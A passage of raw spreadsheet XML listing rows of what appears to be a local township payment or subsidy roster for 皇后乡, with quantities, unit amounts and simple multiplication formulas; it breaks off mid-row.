    <row r="1893" customHeight="1" spans="1:11">
      <c r="A1893" s="23" t="s">
        <v>5056</v>
      </c>
      <c r="B1893" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1893" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1893" s="24" t="s">
        <v>5057</v>
      </c>
      <c r="E1893" s="24" t="s">
        <v>5058</v>
      </c>
      <c r="F1893" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1893" s="24">
        <v>2</v>
      </c>
      <c r="H1893" s="25">
        <v>325</v>
      </c>
      <c r="I1893" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1893" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1893" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1894" customHeight="1" spans="1:11">
      <c r="A1894" s="23" t="s">
        <v>5059</v>
      </c>
      <c r="B1894" s="24" t="str">
        <f>B1893</f>
        <v>皇后乡</v>
      </c>
      <c r="C1894" s="24" t="str">
        <f>C1893</f>
        <v>皇后乡</v>
      </c>
      <c r="D1894" s="23" t="s">
        <v>5060</v>
      </c>
      <c r="E1894" s="23" t="s">
        <v>5061</v>
      </c>
      <c r="F1894" s="24" t="str">
        <f>F1893</f>
        <v>4113210615</v>
      </c>
      <c r="G1894" s="24"/>
      <c r="H1894" s="24"/>
      <c r="I1894" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1894" s="24"/>
      <c r="K1894" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1895" customHeight="1" spans="1:11">
      <c r="A1895" s="23" t="s">
        <v>5062</v>
      </c>
      <c r="B1895" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1895" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1895" s="24" t="s">
        <v>5063</v>
      </c>
      <c r="E1895" s="24" t="s">
        <v>5064</v>
      </c>
      <c r="F1895" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1895" s="24">
        <v>1</v>
      </c>
      <c r="H1895" s="25">
        <v>365</v>
      </c>
      <c r="I1895" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1895" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1895" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1896" customHeight="1" spans="1:11">
      <c r="A1896" s="23" t="s">
        <v>5065</v>
      </c>
      <c r="B1896" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1896" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1896" s="24" t="s">
        <v>5066</v>
      </c>
      <c r="E1896" s="24" t="s">
        <v>4808</v>
      </c>
      <c r="F1896" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1896" s="24">
        <v>1</v>
      </c>
      <c r="H1896" s="25">
        <v>365</v>
      </c>
      <c r="I1896" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1896" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1896" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1897" customHeight="1" spans="1:11">
      <c r="A1897" s="23" t="s">
        <v>5067</v>
      </c>
      <c r="B1897" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1897" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1897" s="24" t="s">
        <v>5068</v>
      </c>
      <c r="E1897" s="24" t="s">
        <v>4903</v>
      </c>
      <c r="F1897" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1897" s="24">
        <v>2</v>
      </c>
      <c r="H1897" s="25">
        <v>325</v>
      </c>
      <c r="I1897" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1897" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1897" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1898" customHeight="1" spans="1:11">
      <c r="A1898" s="23" t="s">
        <v>5069</v>
      </c>
      <c r="B1898" s="24" t="str">
        <f>B1897</f>
        <v>皇后乡</v>
      </c>
      <c r="C1898" s="24" t="str">
        <f>C1897</f>
        <v>皇后乡</v>
      </c>
      <c r="D1898" s="23" t="s">
        <v>5070</v>
      </c>
      <c r="E1898" s="23" t="s">
        <v>4887</v>
      </c>
      <c r="F1898" s="24" t="str">
        <f>F1897</f>
        <v>4113210615</v>
      </c>
      <c r="G1898" s="24"/>
      <c r="H1898" s="24"/>
      <c r="I1898" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1898" s="24"/>
      <c r="K1898" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1899" customHeight="1" spans="1:11">
      <c r="A1899" s="23" t="s">
        <v>5071</v>
      </c>
      <c r="B1899" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1899" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1899" s="24" t="s">
        <v>5072</v>
      </c>
      <c r="E1899" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1899" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1899" s="24">
        <v>1</v>
      </c>
      <c r="H1899" s="25">
        <v>365</v>
      </c>
      <c r="I1899" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1899" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1899" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1900" customHeight="1" spans="1:11">
      <c r="A1900" s="23" t="s">
        <v>5073</v>
      </c>
      <c r="B1900" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1900" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1900" s="24" t="s">
        <v>5074</v>
      </c>
      <c r="E1900" s="24" t="s">
        <v>4970</v>
      </c>
      <c r="F1900" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1900" s="24">
        <v>2</v>
      </c>
      <c r="H1900" s="25">
        <v>325</v>
      </c>
      <c r="I1900" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1900" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1900" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1901" customHeight="1" spans="1:11">
      <c r="A1901" s="23" t="s">
        <v>5075</v>
      </c>
      <c r="B1901" s="24" t="str">
        <f>B1900</f>
        <v>皇后乡</v>
      </c>
      <c r="C1901" s="24" t="str">
        <f>C1900</f>
        <v>皇后乡</v>
      </c>
      <c r="D1901" s="23" t="s">
        <v>5076</v>
      </c>
      <c r="E1901" s="23" t="s">
        <v>5077</v>
      </c>
      <c r="F1901" s="24" t="str">
        <f>F1900</f>
        <v>4113210615</v>
      </c>
      <c r="G1901" s="24"/>
      <c r="H1901" s="24"/>
      <c r="I1901" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1901" s="24"/>
      <c r="K1901" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1902" customHeight="1" spans="1:11">
      <c r="A1902" s="23" t="s">
        <v>5078</v>
      </c>
      <c r="B1902" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1902" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1902" s="24" t="s">
        <v>5079</v>
      </c>
      <c r="E1902" s="24" t="s">
        <v>4903</v>
      </c>
      <c r="F1902" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1902" s="24">
        <v>1</v>
      </c>
      <c r="H1902" s="25">
        <v>365</v>
      </c>
      <c r="I1902" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1902" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1902" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1903" customHeight="1" spans="1:11">
      <c r="A1903" s="23" t="s">
        <v>5080</v>
      </c>
      <c r="B1903" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1903" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1903" s="24" t="s">
        <v>5081</v>
      </c>
      <c r="E1903" s="24" t="s">
        <v>4724</v>
      </c>
      <c r="F1903" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1903" s="24">
        <v>1</v>
      </c>
      <c r="H1903" s="25">
        <v>365</v>
      </c>
      <c r="I1903" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1903" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1903" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1904" customHeight="1" spans="1:11">
      <c r="A1904" s="23" t="s">
        <v>5082</v>
      </c>
      <c r="B1904" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1904" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1904" s="24" t="s">
        <v>5083</v>
      </c>
      <c r="E1904" s="24" t="s">
        <v>5084</v>
      </c>
      <c r="F1904" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1904" s="24">
        <v>1</v>
      </c>
      <c r="H1904" s="25">
        <v>365</v>
      </c>
      <c r="I1904" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1904" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1904" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1905" customHeight="1" spans="1:11">
      <c r="A1905" s="23" t="s">
        <v>5085</v>
      </c>
      <c r="B1905" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1905" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1905" s="24" t="s">
        <v>5086</v>
      </c>
      <c r="E1905" s="24" t="s">
        <v>4800</v>
      </c>
      <c r="F1905" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1905" s="24">
        <v>2</v>
      </c>
      <c r="H1905" s="25">
        <v>325</v>
      </c>
      <c r="I1905" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1905" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1905" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1906" customHeight="1" spans="1:11">
      <c r="A1906" s="23" t="s">
        <v>5087</v>
      </c>
      <c r="B1906" s="24" t="str">
        <f>B1905</f>
        <v>皇后乡</v>
      </c>
      <c r="C1906" s="24" t="str">
        <f>C1905</f>
        <v>皇后乡</v>
      </c>
      <c r="D1906" s="30" t="s">
        <v>5088</v>
      </c>
      <c r="E1906" s="31" t="s">
        <v>4783</v>
      </c>
      <c r="F1906" s="24" t="str">
        <f>F1905</f>
        <v>4113210615</v>
      </c>
      <c r="G1906" s="24"/>
      <c r="H1906" s="24"/>
      <c r="I1906" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1906" s="24"/>
      <c r="K1906" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1907" customHeight="1" spans="1:11">
      <c r="A1907" s="23" t="s">
        <v>5089</v>
      </c>
      <c r="B1907" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1907" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1907" s="24" t="s">
        <v>5090</v>
      </c>
      <c r="E1907" s="24" t="s">
        <v>4892</v>
      </c>
      <c r="F1907" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1907" s="24">
        <v>1</v>
      </c>
      <c r="H1907" s="25">
        <v>365</v>
      </c>
      <c r="I1907" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1907" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1907" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1908" customHeight="1" spans="1:11">
      <c r="A1908" s="23" t="s">
        <v>5091</v>
      </c>
      <c r="B1908" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1908" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1908" s="24" t="s">
        <v>5092</v>
      </c>
      <c r="E1908" s="24" t="s">
        <v>4749</v>
      </c>
      <c r="F1908" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1908" s="24">
        <v>1</v>
      </c>
      <c r="H1908" s="25">
        <v>365</v>
      </c>
      <c r="I1908" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1908" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1908" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1909" customHeight="1" spans="1:11">
      <c r="A1909" s="23" t="s">
        <v>5093</v>
      </c>
      <c r="B1909" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1909" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1909" s="24" t="s">
        <v>5094</v>
      </c>
      <c r="E1909" s="24" t="s">
        <v>5000</v>
      </c>
      <c r="F1909" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1909" s="24">
        <v>2</v>
      </c>
      <c r="H1909" s="25">
        <v>325</v>
      </c>
      <c r="I1909" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1909" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1909" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1910" customHeight="1" spans="1:11">
      <c r="A1910" s="23" t="s">
        <v>5095</v>
      </c>
      <c r="B1910" s="24" t="str">
        <f>B1909</f>
        <v>皇后乡</v>
      </c>
      <c r="C1910" s="24" t="str">
        <f>C1909</f>
        <v>皇后乡</v>
      </c>
      <c r="D1910" s="23" t="s">
        <v>5096</v>
      </c>
      <c r="E1910" s="32" t="s">
        <v>5097</v>
      </c>
      <c r="F1910" s="24" t="str">
        <f>F1909</f>
        <v>4113210615</v>
      </c>
      <c r="G1910" s="24"/>
      <c r="H1910" s="24"/>
      <c r="I1910" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1910" s="24"/>
      <c r="K1910" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1911" customHeight="1" spans="1:11">
      <c r="A1911" s="23" t="s">
        <v>5098</v>
      </c>
      <c r="B1911" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1911" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1911" s="24" t="s">
        <v>5099</v>
      </c>
      <c r="E1911" s="24" t="s">
        <v>4935</v>
      </c>
      <c r="F1911" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1911" s="24">
        <v>2</v>
      </c>
      <c r="H1911" s="25">
        <v>325</v>
      </c>
      <c r="I1911" s="24">
        <f t="shared" si="29"/>
        <v>650</v>
      </c>
      <c r="J1911" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1911" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1912" customHeight="1" spans="1:11">
      <c r="A1912" s="23" t="s">
        <v>5100</v>
      </c>
      <c r="B1912" s="24" t="str">
        <f>B1911</f>
        <v>皇后乡</v>
      </c>
      <c r="C1912" s="24" t="str">
        <f>C1911</f>
        <v>皇后乡</v>
      </c>
      <c r="D1912" s="23" t="s">
        <v>5101</v>
      </c>
      <c r="E1912" s="23" t="s">
        <v>5102</v>
      </c>
      <c r="F1912" s="24" t="str">
        <f>F1911</f>
        <v>4113210615</v>
      </c>
      <c r="G1912" s="24"/>
      <c r="H1912" s="24"/>
      <c r="I1912" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1912" s="24"/>
      <c r="K1912" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1913" customHeight="1" spans="1:11">
      <c r="A1913" s="23" t="s">
        <v>5103</v>
      </c>
      <c r="B1913" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1913" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1913" s="24" t="s">
        <v>5104</v>
      </c>
      <c r="E1913" s="24" t="s">
        <v>5084</v>
      </c>
      <c r="F1913" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1913" s="24">
        <v>3</v>
      </c>
      <c r="H1913" s="25">
        <v>330</v>
      </c>
      <c r="I1913" s="24">
        <f t="shared" si="29"/>
        <v>990</v>
      </c>
      <c r="J1913" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1913" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1914" customHeight="1" spans="1:11">
      <c r="A1914" s="23" t="s">
        <v>5105</v>
      </c>
      <c r="B1914" s="24" t="str">
        <f>B1913</f>
        <v>皇后乡</v>
      </c>
      <c r="C1914" s="24" t="str">
        <f>C1913</f>
        <v>皇后乡</v>
      </c>
      <c r="D1914" s="23" t="s">
        <v>5106</v>
      </c>
      <c r="E1914" s="32" t="s">
        <v>5107</v>
      </c>
      <c r="F1914" s="24" t="str">
        <f>F1913</f>
        <v>4113210615</v>
      </c>
      <c r="G1914" s="24"/>
      <c r="H1914" s="24"/>
      <c r="I1914" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1914" s="24"/>
      <c r="K1914" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1915" customHeight="1" spans="1:11">
      <c r="A1915" s="23" t="s">
        <v>5108</v>
      </c>
      <c r="B1915" s="24" t="str">
        <f>B1914</f>
        <v>皇后乡</v>
      </c>
      <c r="C1915" s="24" t="str">
        <f>C1914</f>
        <v>皇后乡</v>
      </c>
      <c r="D1915" s="26" t="s">
        <v>5109</v>
      </c>
      <c r="E1915" s="26" t="s">
        <v>5110</v>
      </c>
      <c r="F1915" s="24" t="str">
        <f>F1914</f>
        <v>4113210615</v>
      </c>
      <c r="G1915" s="24"/>
      <c r="H1915" s="24"/>
      <c r="I1915" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1915" s="24"/>
      <c r="K1915" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1916" customHeight="1" spans="1:11">
      <c r="A1916" s="23" t="s">
        <v>5111</v>
      </c>
      <c r="B1916" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1916" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1916" s="24" t="s">
        <v>5112</v>
      </c>
      <c r="E1916" s="24" t="s">
        <v>5113</v>
      </c>
      <c r="F1916" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1916" s="24">
        <v>1</v>
      </c>
      <c r="H1916" s="25">
        <v>365</v>
      </c>
      <c r="I1916" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1916" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1916" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1917" customHeight="1" spans="1:11">
      <c r="A1917" s="23" t="s">
        <v>5114</v>
      </c>
      <c r="B1917" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1917" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1917" s="24" t="s">
        <v>5115</v>
      </c>
      <c r="E1917" s="24" t="s">
        <v>5116</v>
      </c>
      <c r="F1917" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1917" s="24">
        <v>3</v>
      </c>
      <c r="H1917" s="25">
        <v>290</v>
      </c>
      <c r="I1917" s="24">
        <f t="shared" si="29"/>
        <v>870</v>
      </c>
      <c r="J1917" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1917" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1918" customHeight="1" spans="1:11">
      <c r="A1918" s="23" t="s">
        <v>5117</v>
      </c>
      <c r="B1918" s="24" t="str">
        <f>B1917</f>
        <v>皇后乡</v>
      </c>
      <c r="C1918" s="24" t="str">
        <f>C1917</f>
        <v>皇后乡</v>
      </c>
      <c r="D1918" s="23" t="s">
        <v>5118</v>
      </c>
      <c r="E1918" s="23" t="s">
        <v>5119</v>
      </c>
      <c r="F1918" s="24" t="str">
        <f>F1917</f>
        <v>4113210615</v>
      </c>
      <c r="G1918" s="24"/>
      <c r="H1918" s="24"/>
      <c r="I1918" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1918" s="24"/>
      <c r="K1918" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1919" customHeight="1" spans="1:11">
      <c r="A1919" s="23" t="s">
        <v>5120</v>
      </c>
      <c r="B1919" s="24" t="str">
        <f>B1918</f>
        <v>皇后乡</v>
      </c>
      <c r="C1919" s="24" t="str">
        <f>C1918</f>
        <v>皇后乡</v>
      </c>
      <c r="D1919" s="23" t="s">
        <v>5121</v>
      </c>
      <c r="E1919" s="23" t="s">
        <v>2056</v>
      </c>
      <c r="F1919" s="24" t="str">
        <f>F1918</f>
        <v>4113210615</v>
      </c>
      <c r="G1919" s="24"/>
      <c r="H1919" s="24"/>
      <c r="I1919" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1919" s="24"/>
      <c r="K1919" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1920" customHeight="1" spans="1:11">
      <c r="A1920" s="23" t="s">
        <v>5122</v>
      </c>
      <c r="B1920" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1920" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1920" s="24" t="s">
        <v>5123</v>
      </c>
      <c r="E1920" s="24" t="s">
        <v>4730</v>
      </c>
      <c r="F1920" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1920" s="24">
        <v>1</v>
      </c>
      <c r="H1920" s="25">
        <v>365</v>
      </c>
      <c r="I1920" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1920" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1920" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1921" customHeight="1" spans="1:11">
      <c r="A1921" s="23" t="s">
        <v>5124</v>
      </c>
      <c r="B1921" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1921" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1921" s="24" t="s">
        <v>5125</v>
      </c>
      <c r="E1921" s="24" t="s">
        <v>4738</v>
      </c>
      <c r="F1921" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1921" s="24">
        <v>1</v>
      </c>
      <c r="H1921" s="25">
        <v>365</v>
      </c>
      <c r="I1921" s="24">
        <f t="shared" si="29"/>
        <v>365</v>
      </c>
      <c r="J1921" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1921" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1922" customHeight="1" spans="1:11">
      <c r="A1922" s="23" t="s">
        <v>5126</v>
      </c>
      <c r="B1922" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1922" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1922" s="24" t="s">
        <v>5127</v>
      </c>
      <c r="E1922" s="24" t="s">
        <v>5128</v>
      </c>
      <c r="F1922" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1922" s="24">
        <v>3</v>
      </c>
      <c r="H1922" s="25">
        <v>290</v>
      </c>
      <c r="I1922" s="24">
        <f t="shared" si="29"/>
        <v>870</v>
      </c>
      <c r="J1922" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1922" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1923" customHeight="1" spans="1:11">
      <c r="A1923" s="23" t="s">
        <v>5129</v>
      </c>
      <c r="B1923" s="24" t="str">
        <f>B1922</f>
        <v>皇后乡</v>
      </c>
      <c r="C1923" s="24" t="str">
        <f>C1922</f>
        <v>皇后乡</v>
      </c>
      <c r="D1923" s="23" t="s">
        <v>5130</v>
      </c>
      <c r="E1923" s="23" t="s">
        <v>5131</v>
      </c>
      <c r="F1923" s="24" t="str">
        <f>F1922</f>
        <v>4113210615</v>
      </c>
      <c r="G1923" s="24"/>
      <c r="H1923" s="24"/>
      <c r="I1923" s="24">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="J1923" s="24"/>
      <c r="K1923" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1924" customHeight="1" spans="1:11">
      <c r="A1924" s="23" t="s">
        <v>5132</v>
      </c>
      <c r="B1924" s="24" t="str">
        <f>B1923</f>
        <v>皇后乡</v>
      </c>
      <c r="C1924" s="24" t="str">
        <f>C1923</f>
        <v>皇后乡</v>
      </c>
      <c r="D1924" s="31" t="s">
        <v>5133</v>
      </c>
      <c r="E1924" s="31" t="s">
        <v>5134</v>
      </c>
      <c r="F1924" s="24" t="str">
        <f>F1923</f>
        <v>4113210615</v>
      </c>
      <c r="G1924" s="24"/>
      <c r="H1924" s="24"/>
      <c r="I1924" s="24">
        <f t="shared" ref="I1924:I1987" si="30">H1924*G1924</f>
        <v>0</v>
      </c>
      <c r="J1924" s="24"/>
      <c r="K1924" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1925" customHeight="1" spans="1:11">
      <c r="A1925" s="23" t="s">
        <v>5135</v>
      </c>
      <c r="B1925" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1925" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1925" s="24" t="s">
        <v>5136</v>
      </c>
      <c r="E1925" s="24" t="s">
        <v>4743</v>
      </c>
      <c r="F1925" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1925" s="24">
        <v>1</v>
      </c>
      <c r="H1925" s="25">
        <v>365</v>
      </c>
      <c r="I1925" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1925" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1925" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1926" customHeight="1" spans="1:11">
      <c r="A1926" s="23" t="s">
        <v>5137</v>
      </c>
      <c r="B1926" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1926" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1926" s="24" t="s">
        <v>5138</v>
      </c>
      <c r="E1926" s="24" t="s">
        <v>4792</v>
      </c>
      <c r="F1926" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1926" s="24">
        <v>1</v>
      </c>
      <c r="H1926" s="25">
        <v>365</v>
      </c>
      <c r="I1926" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1926" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1926" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1927" customHeight="1" spans="1:11">
      <c r="A1927" s="23" t="s">
        <v>5139</v>
      </c>
      <c r="B1927" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1927" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1927" s="24" t="s">
        <v>5140</v>
      </c>
      <c r="E1927" s="24" t="s">
        <v>4817</v>
      </c>
      <c r="F1927" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1927" s="24">
        <v>1</v>
      </c>
      <c r="H1927" s="25">
        <v>365</v>
      </c>
      <c r="I1927" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1927" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1927" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1928" customHeight="1" spans="1:11">
      <c r="A1928" s="23" t="s">
        <v>5141</v>
      </c>
      <c r="B1928" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1928" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1928" s="24" t="s">
        <v>5142</v>
      </c>
      <c r="E1928" s="24" t="s">
        <v>4761</v>
      </c>
      <c r="F1928" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1928" s="24">
        <v>1</v>
      </c>
      <c r="H1928" s="25">
        <v>365</v>
      </c>
      <c r="I1928" s="24">
        <f t="shared" si="30"/>
        <v>365</v>
      </c>
      <c r="J1928" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1928" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1929" customHeight="1" spans="1:11">
      <c r="A1929" s="23" t="s">
        <v>5143</v>
      </c>
      <c r="B1929" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1929" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1929" s="24" t="s">
        <v>5144</v>
      </c>
      <c r="E1929" s="24" t="s">
        <v>5145</v>
      </c>
      <c r="F1929" s="24" t="s">
        <v>4710</v>
      </c>
      <c r="G1929" s="24">
        <v>2</v>
      </c>
      <c r="H1929" s="25">
        <v>325</v>
      </c>
      <c r="I1929" s="24">
        <f t="shared" si="30"/>
        <v>650</v>
      </c>
      <c r="J1929" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1929" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1930" customHeight="1" spans="1:11">
      <c r="A1930" s="23" t="s">
        <v>5146</v>
      </c>
      <c r="B1930" s="24" t="str">
        <f>B1929</f>
        <v>皇后乡</v>
      </c>
      <c r="C1930" s="24" t="str">
        <f>C1929</f>
        <v>皇后乡</v>
      </c>
      <c r="D1930" s="23" t="s">
        <v>5147</v>
      </c>
      <c r="E1930" s="23" t="s">
        <v>5148</v>
      </c>
      <c r="F1930" s="24" t="str">
        <f>F1929</f>
        <v>4113210615</v>
      </c>
      <c r="G1930" s="24"/>
      <c r="H1930" s="24"/>
      <c r="I1930" s="24">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="J1930" s="24"/>
      <c r="K1930" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1931" customHeight="1" spans="1:11">
      <c r="A1931" s="23" t="s">
        <v>5149</v>
      </c>
      <c r="B1931" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C1931" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D1931" s="24" t="s">
        <v>5150</v>
      </c>
      <c r="E1931" s="24" t="s">
        <v>5047</v>
